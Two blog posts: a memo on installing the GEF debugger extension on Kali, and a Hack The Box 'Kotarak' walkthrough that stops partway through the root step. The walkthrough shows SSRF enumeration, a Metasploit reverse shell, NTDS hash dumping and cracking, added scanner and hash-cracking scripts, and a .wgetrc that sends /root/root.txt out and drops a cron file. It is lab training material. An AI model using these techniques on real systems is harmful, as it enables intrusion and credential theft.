17 Jan 2020
Explanation
“GDB Enhanced Features” (GEF) is a GDB extension that adds commands for dynamic analysis and exploit development.
Setting it up on Kali Linux takes a few extra steps; this is a memo of what worked.
Environment
OS: Kali linux 2019.4
GDB: gdb (Debian 8.3.1-1) 8.3.1
Solution
1. Initial Setup
The GitHub repository has installation instructions.
They did not work as-is on this Kali release, but the following commands do:
root@kali:~# git clone https://github.com/hugsy/gef.git
---
root@kali:~# echo source `pwd`/gef/gef.py >> ~/.gdbinit
Starting gdb now shows GEF loading, although some commands are still missing:
root@kali:~# gdb -q test
GEF for linux ready, type `gef' to start, `gef config' to configure
77 commands loaded for GDB 8.3.1 using Python engine 3.7
[*] 3 commands could not be loaded, run `gef missing` to know why.
Reading symbols from test...
( No debugging symbols found in test )
gef➤
The command “gef missing” lists the missing commands and why each one failed to load:
gef➤ gef missing
[*] Command `set-permission` is missing, reason → Missing `keystone-engine` package for Python3, install with: `pip3 install keystone-engine`.
[*] Command `ropper` is missing, reason → Missing `ropper` package for Python3, install with: `pip3 install ropper`.
[*] Command `assemble` is missing, reason → Missing `keystone-engine` package for Python3, install with: `pip3 install keystone-engine`.
gef➤
Then, install the prerequisites.
root@kali:~# apt-get install cmake
---
root@kali:~# pip3 install keystone-engine ropper unicorn
---
After that, the two commands that depend on keystone are still missing:
gef➤ gef missing
[*] Command `set-permission` is missing, reason → Missing `keystone-engine` package for Python3, install with: `pip3 install keystone-engine`.
[*] Command `assemble` is missing, reason → Missing `keystone-engine` package for Python3, install with: `pip3 install keystone-engine`.
gef➤
This time, the keystone library itself has to be built from source.
The source tarball is available from the release page of the official keystone repository.
root@kali:~# ls -l | grep keystone
-rw-r--r-- 1 root root 4326151 Jan 17 02:30 keystone-0.9.1.tar.gz
root@kali:~# tar xzvf keystone-0.9.1.tar.gz
---
root@kali:~# cd keystone-0.9.1/
root@kali:~/keystone-0.9.1# mkdir build
root@kali:~/keystone-0.9.1# cd build/
root@kali:~/keystone-0.9.1/build# ../make-share.sh
---
root@kali:~/keystone-0.9.1/build# make install
---
root@kali:~/keystone-0.9.1/build# ldconfig
After that, we can confirm that we have no missing commands.
root@kali:~/keystone-0.9.1/build# gdb -q test
GEF for linux ready, type `gef' to start, `gef config' to configure
80 commands loaded for GDB 8.3.1 using Python engine 3.7
Reading symbols from test...
(No debugging symbols found in test)
gef➤ gef missing
[+] No missing command
gef➤
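As an added example (not part of the original memo), here is a small Python helper that does the same setup repeatably: it adds the `source` line to .gdbinit only once, which the `echo ... >>` above does not guarantee, and reports the optional packages that `gef missing` would complain about. The gdbinit path, the gef checkout path and the OPTIONAL_DEPS table are assumptions taken from the output above, not part of GEF itself.

```python
"""Added example, not part of the original memo: an idempotent GEF setup helper.

The memo wires GEF in with `echo source .../gef.py >> ~/.gdbinit`, which appends
another `source` line every time it is re-run, and then relies on `gef missing`
to learn which optional Python packages are absent.  The two functions below do
the same two steps repeatably.  Every path is a parameter; the real ~/.gdbinit
is only touched if you pass it (the __main__ block does).  Run it with the same
python3 that gdb embeds, since that is the interpreter whose packages matter.
"""
import importlib.util
from pathlib import Path

# pip distribution name -> importable module name, as listed by `gef missing`.
# (assumed mapping, taken from the `gef missing` output above)
OPTIONAL_DEPS = {
    "keystone-engine": "keystone",
    "ropper": "ropper",
    "unicorn": "unicorn",
}


def ensure_gdbinit_source(gdbinit, gef_py):
    """Add `source <gef_py>` to gdbinit unless that exact line is already there.

    Returns "added" or "present".  Raises FileNotFoundError if gef.py is not a
    file, so a typo in the checkout path fails loudly instead of silently
    writing a broken line into the config.
    """
    gdbinit, gef_py = Path(gdbinit), Path(gef_py).resolve()
    if not gef_py.is_file():
        raise FileNotFoundError(str(gef_py))
    line = "source %s" % gef_py
    existing = gdbinit.read_text().splitlines() if gdbinit.exists() else []
    if line in existing:
        return "present"
    with gdbinit.open("a") as fh:
        fh.write(line + "\n")
    return "added"


def missing_optional_deps(deps=OPTIONAL_DEPS):
    """Return the pip names of optional dependencies whose module cannot be imported.

    This is the same importability check `gef missing` performs.
    """
    return [pip for pip, mod in deps.items() if importlib.util.find_spec(mod) is None]


def pip_install_hint(missing):
    """Render the install command `gef missing` would suggest for the given list."""
    return "pip3 install " + " ".join(missing) if missing else "nothing to install"


if __name__ == "__main__":
    import sys

    home = Path.home()
    gef = Path(sys.argv[1]) if len(sys.argv) > 1 else home / "gef" / "gef.py"
    print("gdbinit:", ensure_gdbinit_source(home / ".gdbinit", gef))
    print("deps:", pip_install_hint(missing_optional_deps()))
```

Run it as `python3 gef_setup.py ~/gef/gef.py`; a second run prints "present" instead of appending a duplicate line, and the deps line tells you what is still left to install before keystone has to be built by hand.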
14 Jan 2020
Retired date: 2018/03/10
Explanation
Hack The Box is a website that hosts a collection of vulnerable machines inside its own VPN.
As practice, I am working through the remaining machines on the list of OSCP-like boxes; this is a walkthrough of “Kotarak”.
Solution
1. Initial Enumeration
TCP Port Scanning:
root@kali:~# nmap -p- 10.10.10.55 -sV -sC
Starting Nmap 7.80 (https://nmap.org) at 2020-01-14 00:42 EET
Nmap scan report for 10.10.10.55
Host is up (0.045s latency).
Not shown: 65531 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 e2:d7:ca:0e:b7:cb:0a:51:f7:2e:75:ea:02:24:17:74 (RSA)
| 256 e8:f1:c0:d3:7d:9b:43:73:ad:37:3b:cb:e1:64:8e:e9 (ECDSA)
|_ 256 6d:e9:26:ad:86:02:2d:68:e1:eb:ad:66:a0:60:17:b8 (ED25519)
8009/tcp open ajp13 Apache Jserv (Protocol v1.3)
| ajp-methods:
| Supported methods: GET HEAD POST PUT DELETE OPTIONS
| Potentially risky methods: PUT DELETE
|_ See https://nmap.org/nsedoc/scripts/ajp-methods.html
8080/tcp open http Apache Tomcat 8.5.5
|_http-favicon: Apache Tomcat
| http-methods:
|_ Potentially risky methods: PUT DELETE
|_http-title: Apache Tomcat/8.5.5 - Error report
60000/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Kotarak Web Hosting
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 75.28 seconds
root@kali:~#
Gobuster port 8080:
root@kali:~# gobuster dir -u http://10.10.10.55:8080/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .html,.php,.txt -s '200,204,301,302,403'
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://10.10.10.55:8080/
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes: 200,204,301,302,403
[+] User Agent: gobuster/3.0.1
[+] Extensions: html,php,txt
[+] Timeout: 10s
===============================================================
2020/01/14 01:55:44 Starting gobuster
===============================================================
/docs (Status: 302)
/examples (Status: 302)
/manager (Status: 302)
/RELEASE-NOTES.txt (Status: 200)
===============================================================
2020/01/14 03:01:44 Finished
===============================================================
root@kali:~#
Gobuster port 60000:
root@kali:~# gobuster dir -u http://10.10.10.55:60000/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .html,.php,.txt -s '200,204,301,302,403'
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://10.10.10.55:60000/
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes: 200,204,301,302,403
[+] User Agent: gobuster/3.0.1
[+] Extensions: txt,html,php
[+] Timeout: 10s
===============================================================
2020/01/14 00:46:42 Starting gobuster
===============================================================
/info.php (Status: 200)
/index.php (Status: 200)
/url.php (Status: 200)
/server-status (Status: 403)
===============================================================
2020/01/14 01:52:27 Finished
===============================================================
root@kali:~#
2. Getting User
We have two interesting services.
Port 8080 runs Tomcat, and port 60000 serves a “Private Browser”: a page that fetches whatever URL is passed in the “path” parameter of url.php.
By pointing that parameter at the host itself, we can read pages that are forbidden from outside, such as “server-status”, which gobuster reported as 403.
In other words, the application is vulnerable to SSRF (Server Side Request Forgery): the server fetches the URL on our behalf, so anything that is reachable only from localhost becomes reachable to us.
Request to view the server-status page of “http://10.10.10.55:60000” through the SSRF:
http://10.10.10.55:60000/url.php?path=http://localhost:60000/server-status
Trying other ports on localhost through the same parameter turns up a service on “127.0.0.1:888” that is not exposed externally.
Request to view “http://127.0.0.1:888” through the SSRF (sent from the local browser):
http://10.10.10.55:60000/url.php?path=http://localhost:888
The page is a file listing, and each entry links back to the same page with a “?doc=” parameter.
So “http://localhost:888/?doc=backup” is the URL for the “backup” entry:
root@kali:~# curl -s 'http://10.10.10.55:60000/url.php?path=http://localhost:888' | grep backup
<td width="27"><a href="?doc=backup" class="tableElement"><img src="inc/images/generic.png" alt="dir" width="22" height="22" border="0"></a></td>
<td class="tableElement"><a href="?doc=backup" class="tableElement">backup</a></td>
root@kali:~#
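The walkthrough states that 127.0.0.1:888 is listening but does not show how it was found. As an added example (not from the original post), the script below enumerates loopback services through an SSRF endpoint shaped like Kotarak's url.php: it requests http://localhost:PORT through the proxy for each candidate port and keeps the ones whose response differs from a port that is known to be closed. The fetcher is injected so the scan logic can run offline against the constructed fake_fetch; urllib_fetch is the one you would pass in against the live box. The endpoint URL is taken from above; the fake backends and their responses are constructed.

```python
"""Added example, not from the original walkthrough: enumerating loopback services
through an SSRF endpoint such as Kotarak's url.php?path=.

The fetch function is injected (fetch(url) -> (status, body)) so the scan logic
runs offline against the constructed fake_fetch below; urllib_fetch is what you
would pass in against the live target.
"""
import re
from urllib.error import HTTPError, URLError
from urllib.parse import quote, unquote
from urllib.request import urlopen

SSRF_ENDPOINT = "http://10.10.10.55:60000/url.php?path="


def ssrf_url(endpoint, internal_url):
    """Wrap an internal URL in the SSRF parameter, percent-encoding it fully so
    that any ? or & in it reaches the target's proxy instead of being split off
    as parameters of url.php itself."""
    return endpoint + quote(internal_url, safe="")


def urllib_fetch(url, timeout=5):
    """Real fetcher: returns (status, body); (None, b"") on connection failure."""
    try:
        with urlopen(url, timeout=timeout) as resp:
            return resp.status, resp.read()
    except HTTPError as err:
        return err.code, err.read()
    except URLError:
        return None, b""


def normalise(body, host, port):
    """Strip the echoed host:port so error pages for different ports compare equal."""
    return body.replace(("%s:%d" % (host, port)).encode(), b"<target>")


def scan_internal_ports(fetch, endpoint, ports, host="localhost", closed_port=1):
    """Return {port: body} for ports whose response differs from a known-closed one."""
    status0, body0 = fetch(ssrf_url(endpoint, "http://%s:%d" % (host, closed_port)))
    closed = (status0, normalise(body0, host, closed_port))
    found = {}
    for port in ports:
        status, body = fetch(ssrf_url(endpoint, "http://%s:%d" % (host, port)))
        if (status, normalise(body, host, port)) != closed:
            found[port] = body
    return found


def extract_hrefs(body):
    """Pull href values out of a discovered page, e.g. the ?doc=backup link on :888."""
    return re.findall(r'href="([^"]*)"', body.decode("utf-8", "replace"))


# Constructed stand-in for the target: what the proxy might hand back per port.
FAKE_BACKENDS = {
    22: (200, b"SSH-2.0-OpenSSH_7.2p2 Ubuntu-4ubuntu2.2\r\n"),
    888: (200, b'<a href="?doc=backup" class="tableElement">backup</a>'),
    8080: (200, b"<title>Apache Tomcat/8.5.5</title>"),
}


def fake_fetch(url):
    """Offline fetcher (constructed): closed ports yield the proxy's empty page."""
    inner = unquote(url.split("path=", 1)[1])
    port = int(re.search(r":(\d+)", inner).group(1))
    return FAKE_BACKENDS.get(port, (200, b""))


if __name__ == "__main__":
    hits = scan_internal_ports(fake_fetch, SSRF_ENDPOINT, range(1, 10000))
    for port, body in sorted(hits.items()):
        print(port, body[:60], extract_hrefs(body))
```

Against a real target swap fake_fetch for urllib_fetch and expect a non-HTTP service (SSH on 22 here) to show up as a banner or a proxy error rather than a page; the comparison against a closed port is what keeps those from being lost in the noise.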
Next, fetch the “backup” entry on port 888.
It renders as an empty page, but the source is a Tomcat users file and contains a credential:
root@kali:~# curl -s 'http://10.10.10.55:60000/url.php?path=localhost:888/?doc=backup' | grep password
you must define such a user - the username and password are arbitrary. It is
them. You will also need to set the passwords to something appropriate.
<user username="tomcat" password="<must-be-changed>" roles="tomcat" />
<user username="both" password="<must-be-changed>" roles="tomcat,role1" />
<user username="role1" password="<must-be-changed>" roles="role1" />
<user username="admin" password="3@g01PdhB!" roles="manager,manager-gui,admin-gui,manager-script" />
root@kali:~#
Logging in to “http://10.10.10.55:8080/manager/html” with the combinations from that file shows that the following credentials are valid for the Tomcat manager:
admin:3@g01PdhB!
The admin user holds the manager-script role, so it can deploy arbitrary WAR files; Metasploit’s tomcat_mgr_upload module does exactly that and gives us a shell as the “tomcat” user.
msf5 > use exploit/multi/http/tomcat_mgr_upload
msf5 exploit(multi/http/tomcat_mgr_upload) > set httpusername admin
httpusername => admin
msf5 exploit(multi/http/tomcat_mgr_upload) > set httppassword 3@g01PdhB!
httppassword => 3@g01PdhB!
msf5 exploit(multi/http/tomcat_mgr_upload) > set rhost 10.10.10.55
rhost => 10.10.10.55
msf5 exploit(multi/http/tomcat_mgr_upload) > set rport 8080
rport => 8080
msf5 exploit(multi/http/tomcat_mgr_upload) > run
[*] Started reverse TCP handler on 10.10.14.36:4444
[*] Retrieving session ID and CSRF token...
[*] Uploading and deploying 63aGm6...
[*] Executing 63aGm6...
[*] Undeploying 63aGm6 ...
[*] Sending stage (53906 bytes) to 10.10.10.55
[*] Meterpreter session 1 opened (10.10.14.36:4444 -> 10.10.10.55:53600) at 2020-01-14 14:53:18 +0200
meterpreter > getuid
Server username: tomcat
meterpreter >
The tomcat user cannot read “user.txt” yet.
It can, however, read some interesting files under its own home directory:
meterpreter > pwd
/home/tomcat/to_archive/pentest_data
meterpreter > ls
Listing: /home/tomcat/to_archive/pentest_data
=============================================
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
100666/rw-rw-rw- 16793600 fil 2017-07-21 19:16:23 +0300 20170721114636_default_192.168.110.133_psexec.ntdsgrab._333512.dit
100666/rw-rw-rw- 12189696 fil 2017-07-21 19:16:45 +0300 20170721114637_default_192.168.110.133_psexec.ntdsgrab._089134.bin
meterpreter >
We can download these files by “download” command of meterpreter shell.
meterpreter > download 20170721114636_default_192.168.110.133_psexec.ntdsgrab._333512.dit
---
meterpreter > download 20170721114637_default_192.168.110.133_psexec.ntdsgrab._089134.bin
These look like a copy of an Active Directory database.
NTDS.dit (“Directory Information Tree”) is the file in which a domain controller stores the directory: its objects, their hierarchy, access permissions and the account credentials.
The “file” command confirms what the two files are:
root@kali:~# file 2017072111463*
20170721114636_default_192.168.110.133_psexec.ntdsgrab._333512.dit: Extensible storage engine DataBase, version 0x620, checksum 0x16d44752, page size 8192, DirtyShutdown, Windows version 6.1
20170721114637_default_192.168.110.133_psexec.ntdsgrab._089134.bin: MS Windows registry file, NT/2000 or above
root@kali:~#
With both the NTDS database and the SYSTEM registry hive (which holds the boot key needed to decrypt it), we can extract the password hashes of every domain account with Impacket’s secretsdump.
See the linked article for additional background.
root@kali:~# impacket-secretsdump -system 20170721114637_default_192.168.110.133_psexec.ntdsgrab._089134.bin -ntds 20170721114636_default_192.168.110.133_psexec.ntdsgrab._333512.dit LOCAL
Impacket v0.9.20 - Copyright 2019 SecureAuth Corporation
[*] Target system bootKey: 0x14b6fb98fedc8e15107867c4722d1399
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Searching for pekList, be patient
[*] PEK # 0 found and decrypted: d77ec2af971436bccb3b6fc4a969d7ff
[*] Reading and decrypting hashes from 20170721114636_default_192.168.110.133_psexec.ntdsgrab._333512.dit
Administrator:500:aad3b435b51404eeaad3b435b51404ee:e64fe0f24ba2489c05e64354d74ebd11:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WIN-3G2B0H151AC$:1000:aad3b435b51404eeaad3b435b51404ee:668d49ebfdb70aeee8bcaeac9e3e66fd:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:ca1ccefcb525db49828fbb9d68298eee:::
WIN2K8$:1103:aad3b435b51404eeaad3b435b51404ee:160f6c1db2ce0994c19c46a349611487:::
WINXP1$:1104:aad3b435b51404eeaad3b435b51404ee:6f5e87fd20d1d8753896f6c9cb316279:::
WIN2K31$:1105:aad3b435b51404eeaad3b435b51404ee:cdd7a7f43d06b3a91705900a592f3772:::
WIN7$:1106:aad3b435b51404eeaad3b435b51404ee:24473180acbcc5f7d2731abe05cfa88c:::
atanas:1108:aad3b435b51404eeaad3b435b51404ee:2b576acbe6bcfda7294d6bd18041b8fe:::
[*] Kerberos keys from 20170721114636_default_192.168.110.133_psexec.ntdsgrab._333512.dit
Administrator:aes256-cts-hmac-sha1-96:6c53b16d11a496d0535959885ea7c79c04945889028704e2a4d1ca171e4374e2
Administrator:aes128-cts-hmac-sha1-96:e2a25474aa9eb0e1525d0f50233c0274
Administrator:des-cbc-md5:75375eda54757c2f
WIN-3G2B0H151AC$:aes256-cts-hmac-sha1-96:84e3d886fe1a81ed415d36f438c036715fd8c9e67edbd866519a2358f9897233
WIN-3G2B0H151AC$:aes128-cts-hmac-sha1-96:e1a487ca8937b21268e8b3c41c0e4a74
WIN-3G2B0H151AC$:des-cbc-md5:b39dc12a920457d5
WIN-3G2B0H151AC$:rc4_hmac:668d49ebfdb70aeee8bcaeac9e3e66fd
krbtgt:aes256-cts-hmac-sha1-96:14134e1da577c7162acb1e01ea750a9da9b9b717f78d7ca6a5c95febe09b35b8
krbtgt:aes128-cts-hmac-sha1-96:8b96c9c8ea354109b951bfa3f3aa4593
krbtgt:des-cbc-md5:10ef08047a862046
krbtgt:rc4_hmac:ca1ccefcb525db49828fbb9d68298eee
WIN2K8$:aes256-cts-hmac-sha1-96:289dd4c7e01818f179a977fd1e35c0d34b22456b1c8f844f34d11b63168637c5
WIN2K8$:aes128-cts-hmac-sha1-96:deb0ee067658c075ea7eaef27a605908
WIN2K8$:des-cbc-md5:d352a8d3a7a7380b
WIN2K8$:rc4_hmac:160f6c1db2ce0994c19c46a349611487
WINXP1$:aes256-cts-hmac-sha1-96:347a128a1f9a71de4c52b09d94ad374ac173bd644c20d5e76f31b85e43376d14
WINXP1$:aes128-cts-hmac-sha1-96:0e4c937f9f35576756a6001b0af04ded
WINXP1$:des-cbc-md5:984a40d5f4a815f2
WINXP1$:rc4_hmac:6f5e87fd20d1d8753896f6c9cb316279
WIN2K31$:aes256-cts-hmac-sha1-96:f486b86bda928707e327faf7c752cba5bd1fcb42c3483c404be0424f6a5c9f16
WIN2K31$:aes128-cts-hmac-sha1-96:1aae3545508cfda2725c8f9832a1a734
WIN2K31$:des-cbc-md5:4cbf2ad3c4f75b01
WIN2K31$:rc4_hmac:cdd7a7f43d06b3a91705900a592f3772
WIN7$:aes256-cts-hmac-sha1-96:b9921a50152944b5849c706b584f108f9b93127f259b179afc207d2b46de6f42
WIN7$:aes128-cts-hmac-sha1-96:40207f6ef31d6f50065d2f2ddb61a9e7
WIN7$:des-cbc-md5:89a1673723ad9180
WIN7$:rc4_hmac:24473180acbcc5f7d2731abe05cfa88c
atanas:aes256-cts-hmac-sha1-96:933a05beca1abd1a1a47d70b23122c55de2fedfc855d94d543152239dd840ce2
atanas:aes128-cts-hmac-sha1-96:d1db0c62335c9ae2508ee1d23d6efca4
atanas:des-cbc-md5:6b80e391f113542a
[*] Cleaning up...
root@kali:~#
Some of the NT hashes can be cracked with CrackStation: the Administrator hash resolves to “f16tomcat!” and the atanas hash to “Password123!”.
That gives us the following credentials from the old domain:
Administrator:f16tomcat!
atanas:Password123!
Kotarak has a local user named “atanas”, so try both passwords against it.
The old domain password for atanas is not reused, but the Administrator one is; this combination works:
atanas:f16tomcat!
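As an added example (not part of the original walkthrough), the script below does the cracking step offline in Python instead of pasting hashes into CrackStation: it parses the hash lines of a secretsdump output, computes NT hashes for a wordlist with a self-contained MD4 (hashlib on OpenSSL 3 systems often refuses md4), matches them against the dump, and also flags accounts that share an NT hash, which is password reuse worth knowing about even when nothing cracks. The Administrator, Guest and atanas lines are copied from the dump above; the svc_test and svc_test2 accounts, their hash and the wordlist are constructed for the example.

```python
"""Added example, not from the original walkthrough: cracking NT hashes from a
secretsdump.py dump offline against a wordlist, with a pure-Python MD4.

An NT hash is MD4 over the password encoded as UTF-16LE, with no salt, so every
candidate is hashed once and compared against every account.  The walkthrough's
own cracks (f16tomcat!, Password123!) are in the wordlist so the script shows
them when run; the svc_test* accounts and their hash are constructed.
"""
import re
import struct

_MASK = 0xFFFFFFFF
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"  # LM hash of "": LM storage disabled


def _rotl(x, s):
    return ((x << s) | (x >> (32 - s))) & _MASK


def md4(data):
    """MD4 per RFC 1320, returning 16 raw bytes (hashlib's md4 is often missing)."""
    bit_len = len(data) * 8
    data += b"\x80" + b"\x00" * ((56 - (len(data) + 1) % 64) % 64) + struct.pack("<Q", bit_len)
    a0, b0, c0, d0 = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    f = lambda x, y, z: (x & y) | (~x & z)
    g = lambda x, y, z: (x & y) | (x & z) | (y & z)
    h = lambda x, y, z: x ^ y ^ z
    rounds = (  # (round function, additive constant, message word order, shifts)
        (f, 0x00000000, range(16), (3, 7, 11, 19)),
        (g, 0x5A827999, (0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15), (3, 5, 9, 13)),
        (h, 0x6ED9EBA1, (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15), (3, 9, 11, 15)),
    )
    for off in range(0, len(data), 64):
        x = struct.unpack("<16I", data[off:off + 64])
        a, b, c, d = a0, b0, c0, d0
        for fn, const, order, shifts in rounds:
            for i, k in enumerate(order):
                a = _rotl((a + fn(b, c, d) + x[k] + const) & _MASK, shifts[i % 4])
                a, b, c, d = d, a, b, c  # rotate so the next step updates the next register
        a0, b0, c0, d0 = (a0 + a) & _MASK, (b0 + b) & _MASK, (c0 + c) & _MASK, (d0 + d) & _MASK
    return struct.pack("<4I", a0, b0, c0, d0)


def nt_hash(password):
    """NT hash as lowercase hex: MD4(UTF-16LE(password)), unsalted."""
    return md4(password.encode("utf-16le")).hex()


DUMP_LINE = re.compile(r"^(?P<user>[^:]+):(?P<rid>\d+):(?P<lm>[0-9a-f]{32}):(?P<nt>[0-9a-f]{32}):::$")


def parse_secretsdump(text):
    """Return [(user, rid, lm, nt)] for the hash lines, skipping [*] status lines."""
    out = []
    for line in text.splitlines():
        m = DUMP_LINE.match(line.strip())
        if m:
            out.append((m["user"], int(m["rid"]), m["lm"], m["nt"]))
    return out


def crack_nt(entries, wordlist):
    """Map user -> password for every entry whose NT hash matches a wordlist entry."""
    table = {nt_hash(w): w for w in wordlist}  # hash each candidate once: no salt
    return {user: table[nt] for user, _, _, nt in entries if nt in table}


def shared_nt(entries):
    """NT hashes used by more than one account: password reuse, crackable or not."""
    by_hash = {}
    for user, _, _, nt in entries:
        by_hash.setdefault(nt, []).append(user)
    return {nt: users for nt, users in by_hash.items() if len(users) > 1}


SAMPLE_DUMP = """\
[*] Dumping Domain Credentials (domain\\uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:e64fe0f24ba2489c05e64354d74ebd11:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
atanas:1108:aad3b435b51404eeaad3b435b51404ee:2b576acbe6bcfda7294d6bd18041b8fe:::
svc_test:1200:aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c:::
svc_test2:1201:aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c:::
"""  # first three lines from the walkthrough; svc_test* are constructed
WORDLIST = ["", "password", "Password123!", "f16tomcat!", "tomcat"]

if __name__ == "__main__":
    entries = parse_secretsdump(SAMPLE_DUMP)
    print("cracked:", crack_nt(entries, WORDLIST))
    print("shared NT hashes:", shared_nt(entries))
    print("LM disabled everywhere:", all(lm == EMPTY_LM for _, _, lm, _ in entries))
```

The same functions work on a full secretsdump output: point parse_secretsdump at the saved file and swap WORDLIST for rockyou or a company-specific list. The "empty LM" check is worth keeping; an LM hash other than aad3b435... means the much weaker LM scheme was still being stored for that account.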
meterpreter > execute -i -f /bin/bash
Process 3 created.
Channel 3 created.
python -c 'import pty;pty.spawn("/bin/bash")'
tomcat@kotarak-dmz:/$ su atanas
su atanas
Password: f16tomcat!
atanas@kotarak-dmz:/$
“user.txt” is in the directory “/home/atanas”.
atanas@kotarak-dmz:~$ pwd
pwd
/home/atanas
atanas@kotarak-dmz:~$ cat user.txt
cat user.txt
93f844f50491ef797c9c1b601b4bece8
atanas@kotarak-dmz:~$
3. Getting Root
Although “atanas” is an ordinary user, the permissions on “/root” allow atanas to list and read it.
It contains two interesting files, “flag.txt” and “app.log”.
flag.txt:
atanas@kotarak-dmz:/root$ cat flag.txt
cat flag.txt
Getting closer! But what you are looking for can't be found here.
atanas@kotarak-dmz:/root$
app.log:
atanas@kotarak-dmz:/root$ cat app.log
cat app.log
10.0.3.133 - - [20/Jul/2017:22:48:01 -0400] "GET /archive.tar.gz HTTP/1.1" 404 503 "-" "Wget/1.16 (linux-gnu)"
10.0.3.133 - - [20/Jul/2017:22:50:01 -0400] "GET /archive.tar.gz HTTP/1.1" 404 503 "-" "Wget/1.16 (linux-gnu)"
10.0.3.133 - - [20/Jul/2017:22:52:01 -0400] "GET /archive.tar.gz HTTP/1.1" 404 503 "-" "Wget/1.16 (linux-gnu)"
atanas@kotarak-dmz:/root$
So “10.0.3.133” is fetching /archive.tar.gz from this host every two minutes with Wget 1.16, which looks like a cron job.
Searching for “wget 1.16 vulnerability” turns up “GNU Wget 1.18 - Arbitrary File Upload / Remote Code Execution” (CVE-2016-4971): versions before 1.18 follow an HTTP redirect to an FTP URL and save the file under the name supplied by the FTP server instead of the name originally requested, so a malicious server can drop a file such as .wgetrc into the client’s current directory.
If that cron job runs as root with /root as its working directory, the dropped .wgetrc is picked up by its next run.
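Spotting the periodic client by eye works for three lines; on a real log it does not. As an added example (not part of the original walkthrough), the script below parses Apache combined-format lines, groups requests by source address, user agent and path, reports the groups whose inter-request gaps are regular (the signature of a cron job), and checks whether a Wget user agent is older than 1.18. SAMPLE_LOG is the three app.log lines from above; the regex and the jitter threshold are assumptions of this example.

```python
"""Added example, not from the original walkthrough: spotting a periodic automated
client in an access log and checking whether its wget is old enough for the
HTTP-to-FTP redirect bug (CVE-2016-4971, fixed in wget 1.18).

SAMPLE_LOG holds the app.log entries from the walkthrough; parse_combined handles
any Apache combined-format line, so periodic_clients can be pointed at a real log.
"""
import re
from collections import defaultdict
from datetime import datetime

COMBINED = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)

SAMPLE_LOG = [  # copied from the walkthrough's /root/app.log
    '10.0.3.133 - - [20/Jul/2017:22:48:01 -0400] "GET /archive.tar.gz HTTP/1.1" 404 503 "-" "Wget/1.16 (linux-gnu)"',
    '10.0.3.133 - - [20/Jul/2017:22:50:01 -0400] "GET /archive.tar.gz HTTP/1.1" 404 503 "-" "Wget/1.16 (linux-gnu)"',
    '10.0.3.133 - - [20/Jul/2017:22:52:01 -0400] "GET /archive.tar.gz HTTP/1.1" 404 503 "-" "Wget/1.16 (linux-gnu)"',
]


def parse_combined(line):
    """Parse one combined-log line into a dict, or None if it does not match."""
    m = COMBINED.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    rec["status"] = int(rec["status"])
    return rec


def periodic_clients(lines, min_hits=3, jitter_s=5):
    """Group hits by (ip, user agent, path) and return the groups whose
    inter-request gaps all lie within jitter_s seconds of each other."""
    groups = defaultdict(list)
    for line in lines:
        rec = parse_combined(line)
        if rec:
            groups[(rec["ip"], rec["ua"], rec["path"])].append(rec["ts"])
    found = []
    for (ip, ua, path), times in groups.items():
        if len(times) < max(min_hits, 2):  # need at least one gap to measure
            continue
        times.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
        if max(gaps) - min(gaps) <= jitter_s:
            found.append({"ip": ip, "ua": ua, "path": path, "hits": len(times),
                          "period_s": round(sum(gaps) / len(gaps))})
    return found


def wget_version(ua):
    """(major, minor) from a Wget user agent, or None for other clients."""
    m = re.search(r"\bWget/(\d+)\.(\d+)", ua)
    return (int(m.group(1)), int(m.group(2))) if m else None


def wget_ftp_redirect_vulnerable(ua):
    """True for wget < 1.18, which follows an HTTP 301 to an FTP URL and saves
    the file under the name the FTP server supplies (CVE-2016-4971)."""
    ver = wget_version(ua)
    return ver is not None and ver < (1, 18)


if __name__ == "__main__":
    for hit in periodic_clients(SAMPLE_LOG):
        flag = "VULNERABLE" if wget_ftp_redirect_vulnerable(hit["ua"]) else "ok"
        print("%(ip)s fetches %(path)s every %(period_s)ss (%(hits)d hits) with %(ua)s" % hit, flag)
```

On the sample it reports one client, 10.0.3.133, fetching /archive.tar.gz every 120 seconds with a vulnerable wget; a 404 on every hit is also a tell, since a scheduled fetch that never succeeds is one nobody is watching.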
According to the vulnerability description, we have to create a .wgetrc file.
root@kali:~# cat .wgetrc
post_file = /root/root.txt
output_document = /etc/cron.d/wget-root-shell
